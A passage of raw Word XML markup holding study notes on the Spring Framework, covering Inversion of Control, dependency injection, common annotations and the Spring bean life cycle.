      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E6E97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plain words:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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62" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C968389"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540FB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re ordering a pizza:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690CC4A7"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ditional approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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 approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Just like that, in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B0E4A"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efine what you need (dependencies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B02D50"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>injects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them into your class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7166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63" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B42E90"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oC Works in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6B116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has an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 xml:space="preserve"> (like ApplicationContext) that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22881E2C"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ns and identifies classes with annotations (@Component, @Service, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA51D4"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antiates them as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502215AB"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s their </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>life cycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6314A"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them wherever needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BDBA7F"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64" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A89971"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out and With IoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14134E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IoC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6E6730" w14:textId="2A08BFF0"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2700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are controlling the object creation manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51510BCB"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65" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E549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IoC (Spring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBEA33"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6E5461DE"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B7C75"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3226341"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sitory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246F027" w14:textId="72574694"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BE08F7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66" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4435AD"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CE4B95" w14:paraId="4A8BD5D0" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59CBF8ED"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7FAB5A0A" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7196735D"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form used in Spring IoC (via constructor/setter/field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="1D101473" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BAA2FF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also handles event listeners for components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CED4371"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67" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540FA5B"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CE4B95" w14:paraId="55F00577" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D1204B"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6936C22B" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740E980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basic IoC container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="07C46A2E" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74C3CCA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68" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38953E"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CE4B95" w14:paraId="2F9C2885" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14C222AC"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250AB" w:rsidRPr="00CE4B95" w14:paraId="6DF64A33" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14CB30B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gisters a class as a bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="47DCC555" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C89773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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="4B08EA7E" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B8B1B47"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bean configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w14:paraId="331B77E1" w14:textId="77777777" w:rsidTr="00A250AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3018C08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a bean manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FD2CF93"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69" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15721644"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54CCFCB4"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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duces </w:t>
      </w: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xml:space="preserve">, increases </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>testability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and improves </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E8649"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mainly using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32527E47"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70" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A0A04" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43641252" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D0E821" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1063FA12" w14:textId="77777777" w:rsidR="00851532" w:rsidRPr="00CE4B95" w:rsidRDefault="00851532" w:rsidP="00A250AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4807B7" w14:textId="3303A658" w:rsidR="00E42DCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB5276" w:rsidP="00E42DCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="_Toc197867656"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explain</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE"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S</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">pring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ean </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Life cycle</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:p w14:paraId="369D50BC" w14:textId="066F8D41" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00F70FE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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A7806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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F6718C"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration in the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636ED82E"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pulate Bean Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68522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Name Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58B25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bean implements BeanNameAware, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>setBeanName(String name)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Factory Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B40A7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 Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4751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Initialization (BeanPostProcessor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6391A39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 Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C120D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Initialization (BeanPostProcessor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86AEAA"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is Ready for Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8671D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F7AC3"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DisposableBean, the destroy() method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B9506"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Pr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61439764" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03443303" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2A950E" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5747D947" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695B3CB4" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB361C3" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191A3FB8" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAA3B8D" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9701E9" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F35C5C" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
